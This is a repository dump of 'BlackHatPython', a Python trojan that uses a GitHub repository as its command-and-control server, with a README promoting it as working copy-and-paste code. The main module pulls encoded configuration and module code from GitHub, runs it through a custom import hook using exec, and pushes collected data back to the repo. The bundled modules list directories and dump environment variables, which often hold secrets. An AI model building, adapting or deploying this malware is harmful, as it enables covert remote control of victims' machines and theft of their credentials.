├── README.md
├── config
    └── abc.json
└── modules
    ├── dirlister.py
    ├── environment.py
    └── git_trojan.py


/README.md:
--------------------------------------------------------------------------------
 1 | # BlackHatPython <div align="center">
 2 | <a href="https://www.codexpace.in/2021/11/command-control-trojan-with-python.html" title="Go to project documentation"><img src="https://img.shields.io/badge/view-Documentation-blue?style=for-the-badge" alt="view - Documentation"></a>
 3 | </div>
 4 | Trojan with github connectivity
 5 | [ Github control & command ]
 6 | - This is 100% working without any changes.
 7 | - You just need to add your github details in the code like udername ,password ,repo etc
 8 | - This code is working in python 3.7 and is meant to be run on the 3.7 version .
 9 | - so no need to scratch your hair to find errors just copy and paste and Bingo
10 |                                                                     -ZED
11 | 


--------------------------------------------------------------------------------
/config/abc.json:
--------------------------------------------------------------------------------
1 | [
2 | 	{
3 | 	 "module" : "dirlister"
4 | 	},
5 | 	{
6 | 	 "module" : "environment"
7 | 	}
8 | ]
9 | 


--------------------------------------------------------------------------------
/modules/dirlister.py:
--------------------------------------------------------------------------------
 1 | #This little snippet code simply exposes a run function that allows that lists all of the filesin current directory and returns that lists as a string. 
 2 | import os
 3 | def run(**args):
 4 |     print("[*] In dirlister module")
 5 |     files = os.listdir(".")
 6 |     return str(files)
 7 |     
 8 |         
 9 | 
10 | 
11 | 


--------------------------------------------------------------------------------
/modules/environment.py:
--------------------------------------------------------------------------------
1 | #This module nsimply retrieves any environment variables that are set on the remote machine on which trojan is running 
2 | import os
3 | def run(**args):
4 |     print("[*]In environment module")
5 |     print(os.environ)
6 |     return str(os.environ)
7 | run()
8 | 


--------------------------------------------------------------------------------
/modules/git_trojan.py:
--------------------------------------------------------------------------------
  1 | ##Code is explained in following page : https://www.codexpace.ml/2021/11/command-control-trojan-with-python.html
  2 | import imp
  3 | import json
  4 | import base64
  5 | import sys
  6 | import time
  7 | from importlib import *
  8 | import random
  9 | import threading
 10 | import queue
 11 | import os
 12 | import github3
 13 | from github3 import login
 14 | 
 15 | trojan_id = "abc"
 16 | # global trojan_config
 17 | rel_path = "blackhat/trojan/"
 18 | trojan_config = "%s.json" % trojan_id
 19 | data_path = "data/%s/" % trojan_id
 20 | trojan_modules = []
 21 | configured = False
 22 | task_queue = queue.Queue()
 23 | 
 24 | 
 25 | # This function simply authenticates the user to the repository ,and retrieves the current repo branch objects for use by other function.
 26 | def connect_to_github():
 27 |     gh = login(username="", password="")
 28 |     repo = gh.repository("", "")
 29 |     branch = repo.branch("master")
 30 |     return gh, repo, branch
 31 | 
 32 | 
 33 | # This function is responsible for grabbing files from the remote repo and then reading the contents in locally.
 34 | def get_file_contents(filepath):
 35 |     gh, repo, branch = connect_to_github()
 36 |     tree = branch.commit.commit.tree.to_tree().recurse()
 37 |     for filename in tree.tree:
 38 |         if filepath in filename.path:
 39 |             print("[*]Found file %s" % filepath)
 40 |             blob = repo.blob(filename._json_data['sha'])
 41 |             return blob.content
 42 |     return None
 43 | 
 44 | 
 45 | # This function is reponsible for retrieving the remote configuration document from the repo so that trojan knows which modules to run.
 46 | def get_trojan_config():
 47 |     global configured
 48 |     config_json = get_file_contents(trojan_config)
 49 |     print(config_json)
 50 | 
 51 |     config = json.loads(base64.b64decode(config_json).decode("UTF-8"))
 52 |     configured = True
 53 |     for task in config:
 54 |         if task['module'] not in sys.modules:
 55 |             exec("import %s" % task['module'])
 56 |     return config
 57 | 
 58 | 
 59 | # It is used to push any data that have been collected on the target machine.
 60 | def store_module_result(data):
 61 |     gh, repo, branch = connect_to_github()
 62 |     remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
 63 |     repo.create_file(remote_path, "commit message", base64.b64encode(data.encode()))
 64 |     return
 65 | 
 66 | 
 67 | # Every time the interpreter attempts to laod a module that isn't available ,ou GitImporter class is used.
 68 | class GitImporter(object):
 69 |     def __init__(self):
 70 |         self.current_module_code = ""
 71 | 
 72 |     # find_module function is first called in an attempt to locate the module
 73 |     def find_module(self, fullname, path=None):
 74 |         if configured:
 75 |             print("[*] Attempting to retrieve %s" % fullname)
 76 |             # we pass the call to attempt to the module to the remote file loader(new_library)
 77 |             new_library = get_file_contents(rel_path + "modules/%s" % fullname)
 78 |             # if we are able to locate the file in our repo we decode the code and store it in our class
 79 |             if new_library is not None:
 80 |                 self.current_module_code = base64.b64decode(new_library)
 81 |                 # by returning self we are telling the interpreter that we found the module and it can then call our load_module function to actually load it.
 82 |                 return self
 83 |         return None
 84 | 
 85 |     def load_module(self, name):
 86 |         # we use the imp module to first create a new blank module object.
 87 |         module = imp.new_module(name)
 88 |         # then we put the code into the module which we retrieved from the GitHub
 89 |         exec(self.current_module_code in module.__dict__)
 90 |         # insert newly created module into the sys.modules list
 91 |         sys.modules[name] = module
 92 |         return module
 93 | 
 94 | 
 95 | #
 96 | def module_runner(module):
 97 |     task_queue.put(1)
 98 |     # while we are running the module_runner funtion ,we simply call the module's run function to kick off its code .
 99 |     result = sys.modules[module].run()
100 |     task_queue.get()
101 |     # Store the result in our repo
102 |     # when we are done running  ,we should have the rsult in a string that we then push to our repo.
103 |     store_module_result(result)
104 |     return
105 | 
106 | 
107 | # main trojan loop
108 | sys.meta_path += [GitImporter()]
109 | while True:
110 |     if task_queue.empty():
111 |         # The first step is to grab the configuration file from the repo
112 |         config = get_trojan_config()
113 |     for task in config:
114 |         # then we kickoff module in its own thread
115 |         t = threading.Thread(target=module_runner, args=(task['module'],))
116 |         t.start()
117 |         time.sleep(random.randint(1, 10))
118 |     time.sleep(random.randint(1000, 10000))
119 | 
120 | 
121 | 
122 | 


--------------------------------------------------------------------------------